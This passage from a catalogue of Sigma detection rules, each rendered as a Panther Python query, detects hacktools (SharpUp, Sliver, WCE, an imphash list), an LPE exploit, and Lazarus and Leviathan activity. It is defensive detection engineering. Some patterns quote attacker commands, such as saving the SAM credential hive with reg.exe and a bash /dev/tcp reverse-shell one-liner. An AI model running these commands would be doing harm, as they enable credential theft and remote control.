                    "UnquotedServicePath" in event.deep_get("CommandLine", default=""),
                    "ProcessDLLHijack" in event.deep_get("CommandLine", default=""),
                    "ModifiableServiceBinaries" in event.deep_get("CommandLine", default=""),
                    "ModifiableScheduledTask" in event.deep_get("CommandLine", default=""),
                    "DomainGPPPassword" in event.deep_get("CommandLine", default=""),
                    "CachedGPPPassword" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - SharpUp PrivEsc Tool Execution
id: c484e533-ee16-4a93-b6ac-f0ea4868b2f1
status: test
description: Detects the use of SharpUp, a tool for local privilege escalation
references:
    - https://github.com/GhostPack/SharpUp
author: Florian Roth (Nextron Systems)
date: 2022-08-20
modified: 2023-02-13
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.discovery
    - attack.execution
    - attack.stealth
    - attack.t1615
    - attack.t1569.002
    - attack.t1574.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\SharpUp.exe'
        - Description: 'SharpUp'
        - CommandLine|contains:
              - 'HijackablePaths'
              - 'UnquotedServicePath'
              - 'ProcessDLLHijack'
              - 'ModifiableServiceBinaries'
              - 'ModifiableScheduledTask'
              - 'DomainGPPPassword'
              - 'CachedGPPPassword'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - Sliver C2 Implant Activity Pattern
Detects process activity patterns as seen being used by Sliver C2 framework implants
status test author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) id 42333b2c-b425-441c-b70e-99404a17170f
panther query
def rule(event):
    if "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8" in event.deep_get(
        "CommandLine", default=""
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Sliver C2 Implant Activity Pattern
id: 42333b2c-b425-441c-b70e-99404a17170f
status: test
description: Detects process activity patterns as seen being used by Sliver C2 framework implants
references:
    - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-08-25
modified: 2023-03-05
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SysmonEOP Execution
Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
status test author Florian Roth (Nextron Systems) id 8a7e90c5-fe6e-45dc-889e-057fe4378bd9
panther query
def rule(event):
    if any(
        [
            event.deep_get("Image", default="").endswith("\\SysmonEOP.exe"),
            any(
                [
                    "IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC"
                    in event.deep_get("Hashes", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - SysmonEOP Execution
id: 8a7e90c5-fe6e-45dc-889e-057fe4378bd9
status: test
description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
references:
    - https://github.com/Wh04m1001/SysmonEoP
author: Florian Roth (Nextron Systems)
date: 2022-12-04
modified: 2024-11-23
tags:
    - cve.2022-41120
    - attack.t1068
    - attack.privilege-escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\SysmonEOP.exe'
    selection_hash:
        Hashes|contains:
            - 'IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5'
            - 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Windows Credential Editor (WCE) Execution
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. It is often used by threat actors for credential dumping and lateral movement within compromised networks.
status test author Florian Roth (Nextron Systems) id 7aa7009a-28b9-4344-8c1f-159489a390df
panther query
def rule(event):
    if any(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\WCE.exe"),
                    event.deep_get("Image", default="").endswith("\\WCE64.exe"),
                ]
            ),
            any(
                [
                    "IMPHASH=136F0A8572C058A96436C82E541E4C41"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=589657C64DDE88533186C39F82FA1F50"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=7D490037BF450877E6D0287BDCFF8D2E"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=BA434A7A729EEC20E136CA4C32D6C740"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8"
                    in event.deep_get("Hashes", default=""),
                    "IMPHASH=E96A73C7BF33A464C510EDE582318BF2"
                    in event.deep_get("Hashes", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Windows Credential Editor (WCE) Execution
id: 7aa7009a-28b9-4344-8c1f-159489a390df
status: test
description: |
    Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
    It is often used by threat actors for credential dumping and lateral movement within compromised networks.
references:
    - https://www.ampliasecurity.com/research/windows-credentials-editor/
author: Florian Roth (Nextron Systems)
date: 2019-12-31
modified: 2025-10-21
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.s0005
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\WCE.exe'
            - '\WCE64.exe'
    selection_hash:
        Hashes|contains:
            - 'IMPHASH=136F0A8572C058A96436C82E541E4C41'
            - 'IMPHASH=589657C64DDE88533186C39F82FA1F50'
            - 'IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF'
            - 'IMPHASH=7D490037BF450877E6D0287BDCFF8D2E'
            - 'IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED'
            - 'IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F'
            - 'IMPHASH=BA434A7A729EEC20E136CA4C32D6C740'
            - 'IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8'
            - 'IMPHASH=E96A73C7BF33A464C510EDE582318BF2'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical
critical
Hacktool Execution - Imphash
Detects the execution of different Windows-based hacktools via their import hash (imphash), even if the files have been renamed
status test author Florian Roth (Nextron Systems) id 24e3e58a-646b-4b50-adef-02ef935b9fc8
panther query
def rule(event):
    if any(
        [
            "IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932" in event.deep_get("Hashes", default=""),
            "IMPHASH=3A19059BD7688CB88E70005F18EFC439" in event.deep_get("Hashes", default=""),
            "IMPHASH=bf6223a49e45d99094406777eb6004ba" in event.deep_get("Hashes", default=""),
            "IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1" in event.deep_get("Hashes", default=""),
            "IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC" in event.deep_get("Hashes", default=""),
            "IMPHASH=F9A28C458284584A93B14216308D31BD" in event.deep_get("Hashes", default=""),
            "IMPHASH=6118619783FC175BC7EBECFF0769B46E" in event.deep_get("Hashes", default=""),
            "IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA" in event.deep_get("Hashes", default=""),
            "IMPHASH=563233BFA169ACC7892451F71AD5850A" in event.deep_get("Hashes", default=""),
            "IMPHASH=87575CB7A0E0700EB37F2E3668671A08" in event.deep_get("Hashes", default=""),
            "IMPHASH=13F08707F759AF6003837A150A371BA1" in event.deep_get("Hashes", default=""),
            "IMPHASH=1781F06048A7E58B323F0B9259BE798B" in event.deep_get("Hashes", default=""),
            "IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5" in event.deep_get("Hashes", default=""),
            "IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D" in event.deep_get("Hashes", default=""),
            "IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2" in event.deep_get("Hashes", default=""),
            "IMPHASH=713C29B396B907ED71A72482759ED757" in event.deep_get("Hashes", default=""),
            "IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F" in event.deep_get("Hashes", default=""),
            "IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E" in event.deep_get("Hashes", default=""),
            "IMPHASH=8B114550386E31895DFAB371E741123D" in event.deep_get("Hashes", default=""),
            "IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793" in event.deep_get("Hashes", default=""),
            "IMPHASH=9D68781980370E00E0BD939EE5E6C141" in event.deep_get("Hashes", default=""),
            "IMPHASH=B18A1401FF8F444056D29450FBC0A6CE" in event.deep_get("Hashes", default=""),
            "IMPHASH=CB567F9498452721D77A451374955F5F" in event.deep_get("Hashes", default=""),
            "IMPHASH=730073214094CD328547BF1F72289752" in event.deep_get("Hashes", default=""),
            "IMPHASH=17B461A082950FC6332228572138B80C" in event.deep_get("Hashes", default=""),
            "IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9" in event.deep_get("Hashes", default=""),
            "IMPHASH=819B19D53CA6736448F9325A85736792" in event.deep_get("Hashes", default=""),
            "IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E" in event.deep_get("Hashes", default=""),
            "IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74" in event.deep_get("Hashes", default=""),
            "IMPHASH=0588081AB0E63BA785938467E1B10CCA" in event.deep_get("Hashes", default=""),
            "IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C" in event.deep_get("Hashes", default=""),
            "IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29" in event.deep_get("Hashes", default=""),
            "IMPHASH=4DA924CF622D039D58BCE71CDF05D242" in event.deep_get("Hashes", default=""),
            "IMPHASH=E7A3A5C377E2D29324093377D7DB1C66" in event.deep_get("Hashes", default=""),
            "IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF" in event.deep_get("Hashes", default=""),
            "IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE" in event.deep_get("Hashes", default=""),
            "IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4" in event.deep_get("Hashes", default=""),
            "IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338" in event.deep_get("Hashes", default=""),
            "IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E" in event.deep_get("Hashes", default=""),
            "IMPHASH=E6F9D5152DA699934B30DAAB206471F6" in event.deep_get("Hashes", default=""),
            "IMPHASH=3AD59991CCF1D67339B319B15A41B35D" in event.deep_get("Hashes", default=""),
            "IMPHASH=FFDD59E0318B85A3E480874D9796D872" in event.deep_get("Hashes", default=""),
            "IMPHASH=0CF479628D7CC1EA25EC7998A92F5051" in event.deep_get("Hashes", default=""),
            "IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51" in event.deep_get("Hashes", default=""),
            "IMPHASH=D6D0F80386E1380D05CB78E871BC72B1" in event.deep_get("Hashes", default=""),
            "IMPHASH=38D9E015591BBFD4929E0D0F47FA0055" in event.deep_get("Hashes", default=""),
            "IMPHASH=0E2216679CA6E1094D63322E3412D650" in event.deep_get("Hashes", default=""),
            "IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB" in event.deep_get("Hashes", default=""),
            "IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798" in event.deep_get("Hashes", default=""),
            "IMPHASH=11083E75553BAAE21DC89CE8F9A195E4" in event.deep_get("Hashes", default=""),
            "IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80" in event.deep_get("Hashes", default=""),
            "IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F" in event.deep_get("Hashes", default=""),
            "IMPHASH=767637C23BB42CD5D7397CF58B0BE688" in event.deep_get("Hashes", default=""),
            "IMPHASH=14C4E4C72BA075E9069EE67F39188AD8" in event.deep_get("Hashes", default=""),
            "IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC" in event.deep_get("Hashes", default=""),
            "IMPHASH=7D010C6BB6A3726F327F7E239166D127" in event.deep_get("Hashes", default=""),
            "IMPHASH=89159BA4DD04E4CE5559F132A9964EB3" in event.deep_get("Hashes", default=""),
            "IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F" in event.deep_get("Hashes", default=""),
            "IMPHASH=5834ED4291BDEB928270428EBBAF7604" in event.deep_get("Hashes", default=""),
            "IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38" in event.deep_get("Hashes", default=""),
            "IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894" in event.deep_get("Hashes", default=""),
            "IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74" in event.deep_get("Hashes", default=""),
            "IMPHASH=3DE09703C8E79ED2CA3F01074719906B" in event.deep_get("Hashes", default=""),
            "IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F" in event.deep_get("Hashes", default=""),
            "IMPHASH=E96A73C7BF33A464C510EDE582318BF2" in event.deep_get("Hashes", default=""),
            "IMPHASH=32089B8851BBF8BC2D014E9F37288C83" in event.deep_get("Hashes", default=""),
            "IMPHASH=09D278F9DE118EF09163C6140255C690" in event.deep_get("Hashes", default=""),
            "IMPHASH=03866661686829d806989e2fc5a72606" in event.deep_get("Hashes", default=""),
            "IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d" in event.deep_get("Hashes", default=""),
            "IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE" in event.deep_get("Hashes", default=""),
            "IMPHASH=19584675D94829987952432E018D5056" in event.deep_get("Hashes", default=""),
            "IMPHASH=330768A4F172E10ACB6287B87289D83B" in event.deep_get("Hashes", default=""),
            "IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313" in event.deep_get("Hashes", default=""),
            "IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC" in event.deep_get("Hashes", default=""),
            "IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28" in event.deep_get("Hashes", default=""),
            "IMPHASH=96DF3A3731912449521F6F8D183279B1" in event.deep_get("Hashes", default=""),
            "IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46" in event.deep_get("Hashes", default=""),
            "IMPHASH=51791678F351C03A0EB4E2A7B05C6E17" in event.deep_get("Hashes", default=""),
            "IMPHASH=25CE42B079282632708FC846129E98A5" in event.deep_get("Hashes", default=""),
            "IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20" in event.deep_get("Hashes", default=""),
            "IMPHASH=59223B5F52D8799D38E0754855CBDF42" in event.deep_get("Hashes", default=""),
            "IMPHASH=81E75D8F1D276C156653D3D8813E4A43" in event.deep_get("Hashes", default=""),
            "IMPHASH=17244E8B6B8227E57FE709CCAD421420" in event.deep_get("Hashes", default=""),
            "IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4" in event.deep_get("Hashes", default=""),
            "IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C" in event.deep_get("Hashes", default=""),
            "IMPHASH=40445337761D80CF465136FAFB1F63E6" in event.deep_get("Hashes", default=""),
            "IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6" in event.deep_get("Hashes", default=""),
            "IMPHASH=B50199E952C875241B9CE06C971CE3C1" in event.deep_get("Hashes", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Hacktool Execution - Imphash
id: 24e3e58a-646b-4b50-adef-02ef935b9fc8
status: test
description: Detects the execution of different Windows-based hacktools via their import hash (imphash), even if the files have been renamed
references:
    - Internal Research
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2024-11-23
tags:
    - attack.credential-access
    - attack.resource-development
    - attack.t1588.002
    - attack.t1003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Hashes|contains: # Sysmon field hashes contains all types
            - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam
            - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam
            - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam
            - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato
            - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato
            - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG
            - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato
            - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato
            - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato
            - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato
            - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump
            - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump
            - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump
            - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump
            - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump
            - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump
            - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump
            - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump
            - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump
            - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX
            - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump
            - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump
            - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump
            - IMPHASH=730073214094CD328547BF1F72289752 # Htran
            - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons
            - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons
            - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons
            - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons
            - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump
            - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump
            - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump
            - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump
            - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump
            - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump
            - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump
            - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump
            - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump
            - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump
            - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump
            - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump
            - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump
            - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump
            - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump
            - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump
            - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump
            - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz
            - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz
            - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader
            - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader
            - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader
            - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader
            - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump
            - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi
            - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi
            - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi
            - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi
            - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi
            - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi
            - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi
            - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi
            - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi
            - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi
            - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi
            - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE
            - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE
            - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers
            - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert
            - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert
            - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert
            - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
            - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet
            - IMPHASH=330768A4F172E10ACB6287B87289D83B # SharpEvtMute Hook
            - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz
            - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller
            - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller
            - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab
            - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab
            - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab
            - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia
            - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast
            - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast
            - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast
            - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast
            - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast
            - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast
            - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast
            - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer
            - IMPHASH=B50199E952C875241B9CE06C971CE3C1 # EventLogCrasher
    condition: selection
falsepositives:
    - Legitimate use of one of these tools
level: critical
critical
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
status test author Florian Roth (Nextron Systems) id 3be82d5d-09fe-4d6a-a275-0d40d234d324
panther query
def rule(event):
    if all(
        [
            event.deep_get("Image", default="").endswith("\\msiexec.exe"),
            event.deep_get("TargetFilename", default="").startswith(
                "C:\\Program Files (x86)\\Microsoft\\Edge\\Application"
            ),
            event.deep_get("TargetFilename", default="").endswith("\\elevation_service.exe"),
        ]
    ):
        return True
    return False
view Sigma YAML
title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
id: 3be82d5d-09fe-4d6a-a275-0d40d234d324
status: test
description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
references:
    - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
    - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
author: Florian Roth (Nextron Systems)
date: 2021-11-22
modified: 2022-12-25
tags:
    - attack.privilege-escalation
    - attack.t1068
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        Image|endswith: '\msiexec.exe'
        TargetFilename|startswith: 'C:\Program Files (x86)\Microsoft\Edge\Application'
        TargetFilename|endswith: '\elevation_service.exe'
    condition: selection
falsepositives:
    - Unknown
    - Possibly some Microsoft Edge upgrades
level: critical
critical
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
status test author Florian Roth (Nextron Systems), wagga id 24c4d154-05a4-4b99-b57d-9b977472443a
panther query
def rule(event):
    if any(
        [
            any(
                [
                    "reg.exe save hklm\\sam %temp%\\~reg_sam.save"
                    in event.deep_get("CommandLine", default=""),
                    "1q2w3e4r@#$@#$@#$" in event.deep_get("CommandLine", default=""),
                    " -hp1q2w3e4 " in event.deep_get("CommandLine", default=""),
                    ".dat data03 10000 -p " in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    "netstat -aon | find " in event.deep_get("CommandLine", default=""),
                    "ESTA" in event.deep_get("CommandLine", default=""),
                    " > %temp%\\~" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    ".255 10 C:\\ProgramData\\IBM\\" in event.deep_get("CommandLine", default=""),
                    ".DAT" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    " /c " in event.deep_get("CommandLine", default=""),
                    " -p 0x" in event.deep_get("CommandLine", default=""),
                    any(
                        [
                            "C:\\ProgramData\\" in event.deep_get("CommandLine", default=""),
                            "C:\\RECYCLER\\" in event.deep_get("CommandLine", default=""),
                        ]
                    ),
                ]
            ),
            all(
                [
                    "rundll32 " in event.deep_get("CommandLine", default=""),
                    "C:\\ProgramData\\" in event.deep_get("CommandLine", default=""),
                    any(
                        [
                            ".bin," in event.deep_get("CommandLine", default=""),
                            ".tmp," in event.deep_get("CommandLine", default=""),
                            ".dat," in event.deep_get("CommandLine", default=""),
                            ".io," in event.deep_get("CommandLine", default=""),
                            ".ini," in event.deep_get("CommandLine", default=""),
                            ".db," in event.deep_get("CommandLine", default=""),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lazarus Group Activity
id: 24c4d154-05a4-4b99-b57d-9b977472443a
related:
    - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
      type: obsolete
status: test
description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
references:
    - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
    - https://www.hvs-consulting.de/lazarus-report/
author: Florian Roth (Nextron Systems), wagga
date: 2020-12-23
modified: 2023-03-10
tags:
    - attack.g0032
    - attack.execution
    - attack.t1059
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_generic:
        CommandLine|contains:
            - 'reg.exe save hklm\sam %temp%\~reg_sam.save'
            - '1q2w3e4r@#$@#$@#$'
            - ' -hp1q2w3e4 '
            - '.dat data03 10000 -p '
    selection_netstat:
        CommandLine|contains|all:
            - 'netstat -aon | find '
            - 'ESTA'
            - ' > %temp%\~'
    # Network share discovery
    selection_network_discovery:
        CommandLine|contains|all:
            - '.255 10 C:\ProgramData\IBM\'
            - '.DAT'
    selection_persistence:
        CommandLine|contains|all:
            - ' /c '
            - ' -p 0x'
        CommandLine|contains:
            - 'C:\ProgramData\'
            - 'C:\RECYCLER\'
    selection_rundll32:
        CommandLine|contains|all:
            - 'rundll32 '
            - 'C:\ProgramData\'
        CommandLine|contains:
            - '.bin,'
            - '.tmp,'
            - '.dat,'
            - '.io,'
            - '.ini,'
            - '.db,'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical
Leviathan Registry Key Activity
Detects a registry key used by the Leviathan APT in a Malaysia-focused campaign
status test author Aidan Bracher id 70d43542-cd2d-483c-8f30-f16b436fd7db
panther query
def rule(event):
    if "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd" in event.deep_get(
        "TargetObject", default=""
    ):
        return True
    return False
view Sigma YAML
title: Leviathan Registry Key Activity
id: 70d43542-cd2d-483c-8f30-f16b436fd7db
status: test
description: Detects a registry key used by the Leviathan APT in a Malaysia-focused campaign
references:
    - https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
author: Aidan Bracher
date: 2020-07-07
modified: 2023-09-19
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
    - detection.emerging-threats
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\Run\ntkd'
    condition: selection
level: critical
critical
Linux Reverse Shell Indicator
Detects bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
status test author Florian Roth (Nextron Systems) id 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
panther query
def rule(event):
    if all(
        [
            event.deep_get("Image", default="").endswith("/bin/bash"),
            event.deep_get("DestinationIp", default="") not in ["127.0.0.1", "0.0.0.0"],
        ]
    ):
        return True
    return False
view Sigma YAML
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
